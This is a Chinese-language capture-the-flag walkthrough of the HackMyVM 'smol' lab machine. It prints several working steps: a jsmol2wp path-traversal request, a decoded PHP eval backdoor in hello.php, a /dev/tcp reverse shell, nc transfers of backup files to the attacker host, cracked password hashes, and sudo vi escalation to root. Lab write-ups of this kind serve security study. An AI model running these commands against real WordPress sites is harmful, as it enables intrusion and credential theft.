HackMyVM-smol靶机详解WP

信息收集

服务探测

扫到了80端口，网页需要通过域名访问，改一下hosts

❯ ip=192.168.56.112
❯ rustscan -a $ip |tee scan.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.112:22
Open 192.168.56.112:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 14:46 CST
Initiating Ping Scan at 14:46
Scanning 192.168.56.112 [4 ports]
Completed Ping Scan at 14:46, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:46
Completed Parallel DNS resolution of 1 host. at 14:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:46
Scanning 192.168.56.112 [2 ports]
Discovered open port 22/tcp on 192.168.56.112
Discovered open port 80/tcp on 192.168.56.112
Completed SYN Stealth Scan at 14:46, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.112
Host is up, received echo-reply ttl 63 (0.00056s latency).
Scanned at 2024-12-11 14:46:29 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

访问一下发现是WordPress的CMS框架，利用wpscan扫一下

这个wordpress用了个名为jsmol2wp的插件

❯ wpscan --url www.smol.hmv
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://www.smol.hmv/ [192.168.56.112]
[+] Started: Wed Dec 11 15:12:55 2024

Interesting Finding(s):

................省略..................

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] jsmol2wp
 | Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
 | Latest Version: 1.07 (up to date)
 | Last Updated: 2018-03-09T10:28:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.07 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=======================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Dec 11 15:12:57 2024
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 45.729 KB
[+] Data Received: 21.913 MB
[+] Memory used: 283.352 MB
[+] Elapsed time: 00:00:02

通过搜索插件名字加版本号发现存在文件遍历漏洞，可以进行读取文件

找到POC，简单利用一下

这样就读到wordpress的账户wpuser密码kbLSF2Vop#lw3rjDZ629*Z%G

进到wp-login.php登入一下，发现这个用户并不是admin权限的用户

有个pages是名为网络管理员的任务

是个有关插件名为hello dolly，根据翻译大概率这个插件有后门，我们尝试对网页进行模糊测试

❯ ffuf -ic -c -u 'http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../FUZZ' -w /usr/share/seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt  -fs 2

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 2
________________________________________________

wp-content/plugins/hello.php [Status: 200, Size: 2704, Words: 321, Lines: 104, Duration: 7ms]
:: Progress: [13370/13370] :: Job [1/1] :: 427 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

在plugins中果然有这个插件，利用上面的漏洞读取一下文件源码

``

拿到源码其中有一段定义函数时base64编码后的

function hello_dolly() {
	eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
	
	$chosen = hello_dolly_get_lyric();
	$lang   = '';
	if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
		$lang = ' lang="en"';
	}

	printf(
		'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
		__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
		$lang,
		$chosen
	);
}

解码后果然藏着一句话木马，顺便问了下GPT，得出参数即为cmd

if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); } 

或者使用kali自带的printf也能打印出来

❯ printf "\143\x6d\144"
cmd

激活后，您将在每一页管理屏幕的右上角随机看到Hello, Dolly歌词。

查看插件描述后，这个插件会在登入wp-admin后自动激活，添加cmd参数也能生效

┌──(kali㉿kali)-[~]
└─$ vim rev.sh
sh -i 5<> /dev/tcp/192.168.56.102/4444 0<&5 1>&5 2>&5
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.112 - - [11/Dec/2024 03:08:52] "GET /rev.sh HTTP/1.1" 200 -

我尝试使用其他命令好像都没有回显，只能在本地写个rev反弹，靶机先wget再执行一下了

成功拿到WebShell

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 41714
sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ /usr/bin/script -qc /bin/bash 2>/dev/null
www-data@smol:/var/www/wordpress/wp-admin$

发现在/opt目录下有个备份文件，通过nc传到kali上

www-data@smol:/opt$ ls
ls
wp_backup.sql
www-data@smol:/opt$ which nc
which nc
/usr/bin/nc
www-data@smol:/opt$ nc 192.168.56.102 4444 <wp_backup.sql
nc 192.168.56.102 4444 <wp_backup.sql
——————————————————————————————————————
┌──(kali㉿kali)-[~]
└─$ nc -lvp  4444 > wp_backup.sql
listening on [any] 4444 ...
192.168.56.112: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 51170

搜索sql文件中的关键字wpuser格式化代码得到

这里其实也可以通过登入mysql也能查询到，不过只有admin用户的hash值是和bak文件对不上的，其他都是一模一样

www-data@smol:/home$ mmysql -u wpuser -p
mysql -u wpuser -p
Enter password: kbLSF2Vop#lw3rjDZ629*Z%G

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 324
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin         | [email protected]     | http://www.smol.hmv | 2023-08-16 06:58:30 |
        |           0 | admin                  |
|  2 | wpuser     | $P$BfZjtJpXL9gBwzNjLMTnTvBVh2Z1/E. | wp            | [email protected]        | http://smol.thm     | 2023-08-16 11:04:07 |
        |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think         | [email protected] | http://smol.thm     | 2023-08-16 15:01:02 |
        |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege          | [email protected]      | http://smol.thm     | 2023-08-17 20:18:50 |
        |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego         | [email protected]     | http://smol.thm     | 2023-08-17 20:19:15 |
        |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi          | [email protected]      | http://smol.thm     | 2023-08-17 20:20:01 |
        |           0 | xavi                   |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)

使用hashcat爆破一下，其他用户太久了大概率爆不出了，只有diego用户很快就爆出来，得到密码为sandiegocalifornia

❯ hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt

$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1:sandiegocalifornia

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
Time.Started.....: Wed Dec 11 16:33:27 2024 (4 mins, 23 secs)
Time.Estimated...: Wed Dec 11 16:37:50 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     4999 H/s (6.24ms) @ Accel:256 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1316864/14344385 (9.18%)
Rejected.........: 0/1316864 (0.00%)
Restore.Point....: 1315840/14344385 (9.17%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7936-8192
Candidate.Engine.: Device Generator
Candidates.#1....: sangitarai -> sanabi

Started: Wed Dec 11 16:33:10 2024
Stopped: Wed Dec 11 16:37:51 2024

用户提权

su切换用户登入一下，拿到user的flag了

www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
diego@smol:/var/www/wordpress/wp-admin$ cd ~
cd ~
diego@smol:~$ ls
ls
user.txt
diego@smol:~$ cat us
cat user.txt
45edaec653ff9ee06236b7ce72b86963

尝试搜索其他有价值的信息，suid权限的文件也没有，sudo权限也没有

发现其他用户的文件夹名为internal的组可以读取，而我这个diego就属于internal组中

diego@smol:/home$ ls -al
ls -al
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  2 diego internal 4096 Aug 18  2023 diego
drwxr-x---  2 gege  internal 4096 Aug 18  2023 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi
diego@smol:/home$ id
id
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:/home$ ls -al *
ls -al *
diego:
total 24
drwxr-x--- 2 diego internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego     220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 diego diego    3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 diego diego     807 Feb 25  2020 .profile
-rw-r--r-- 1 root  root       33 Aug 16  2023 user.txt
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null

gege:
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip

think:
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null

xavi:
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 xavi xavi     3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 xavi xavi      807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root        9 Aug 18  2023 .viminfo -> /dev/null

gege用户里有备份文件但是无法打开，还发现think用户有.ssh文件，瞅瞅有没有私钥文件

呦还真有，ssh连上去

❯ vim id_rsa
❯ chmod 600 id_rsa
❯ ssh think@$ip -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 11 Dec 2024 05:11:22 PM UTC

  System load:  0.09              Processes:                218
  Usage of /:   55.7% of 9.75GB   Users logged in:          0
  Memory usage: 43%               IPv4 address for enp0s17: 192.168.56.112
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

think@smol:~$

之前那个备份文件还是不能打开，不过看了下group，发现think和gege用户属于同一个dev组中，不知道系统有没有设置允许用户切换到同一组中的其他用户

可以查看/etc/pam.d/su这个文件

think@smol:~$ cat /etc/pam.d/su
#
# The PAM configuration file for the Shadow `su' service
#

# This allows root to su without passwords (normal operation)
auth       sufficient pam_rootok.so
auth  [success=ignore default=1] pam_succeed_if.so user = gege
auth  sufficient                 pam_succeed_if.so use_uid user = think

配置是可以不用密码就切换到gege用户的

think@smol:~$ su gege
gege@smol:/home/think$ cd ~
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ nc 192.168.56.102 4444 <wordpress.old.zip
————————————————————————————————————————————
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 4444>wordpress.old.zip
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 54622
┌──(kali㉿kali)-[~]
└─$ file wordpress.old.zip
wordpress.old.zip: Zip archive data, at least v1.0 to extract, compression method=store

┌──(kali㉿kali)-[~]
└─$ unzip wordpress.old.zip
Archive:  wordpress.old.zip
   creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:

Root提权

这里解压需要密码，拿之前gege的hash爆到的密码[email protected]，爆了20分钟

或者你直接爆压缩包可能会快很多

❯ hashcat -a 0 -m 400 hash_gege /usr/share/wordlists/rockyou.txt
$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1:[email protected]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
Time.Started.....: Wed Dec 11 16:41:24 2024 (25 mins, 3 secs)
Time.Estimated...: Wed Dec 11 17:06:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     5074 H/s (6.25ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7622656/14344385 (53.14%)
Rejected.........: 0/7622656 (0.00%)
Restore.Point....: 7620608/14344385 (53.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidate.Engine.: Device Generator
Candidates.#1....: herrymon -> hermoxadoriannita

Started: Wed Dec 11 16:41:24 2024
Stopped: Wed Dec 11 17:06:28 2024

在备份文件中的wp-config.php存有xavi的密码为P@ssw0rdxavi@，拿着密码登入发现有sudo权限，可以执行vi

那就利用vi提权，进入文件分别按冒号输入set shell=/bin/sh和shell

这里也可以你直接修改passwd文件就完事了，哎呀，我一时就想着提权了，忘记文件可以直接修改了😅

删除x，将root:x:0:0:root:/root:/usr/bin/bash改为root::0:0:root:/root:/usr/bin/bash，末尾贴一个各个字段的作用

gege@smol:~$ su xavi
Password:
xavi@smol:/home/gege$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd
xavi@smol:/home/gege$ sudo /usr/bin/vi /etc/passwd


Press ENTER or type command to continue
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
bf89ea3ea01992353aef1f576214d4e4

1. root
   • 这是用户的用户名。也就是该账户的名称，用于登录系统时进行身份验证。
2. x
   • 这里的 x 表示密码在 /etc/shadow 文件中。过去，密码通常会直接存储在 /etc/passwd 文件中，但为了安全性，现代 Linux 系统将密码存储在 /etc/shadow 文件中，并用一个 x 或 * 来指代密码。实际的密码信息存储在 /etc/shadow 文件中的对应行。
3. 0
   • 这是用户的用户 ID (UID)。UID 是系统为用户分配的一个唯一标识符。通常，0 是超级用户（root）的 UID，表示该账户具有管理员权限。
4. 0
   • 这是用户的组 ID (GID)，表示该用户所属的主要用户组的 ID。0 也表示超级用户（root）组，因此该用户的主要组是 root 组。
5. root
   • 这是用户的 “GECOS” 字段，通常用来提供用户的全名或其他描述信息。在这里，它是用于表示该账户的描述，通常与用户名相同。
6. /root
   • 这是用户的家目录，指明了该用户的默认工作目录。登录时，用户会被自动带到这个目录。/root 是 root 用户的家目录，通常具有更高的权限。
7. /bin/bash
   • 这是用户登录时使用的默认 shell，也就是在用户登录后自动启动的程序。在这里，它表示该用户登录时将会使用 /bin/bash，即 Bash shell，来执行命令。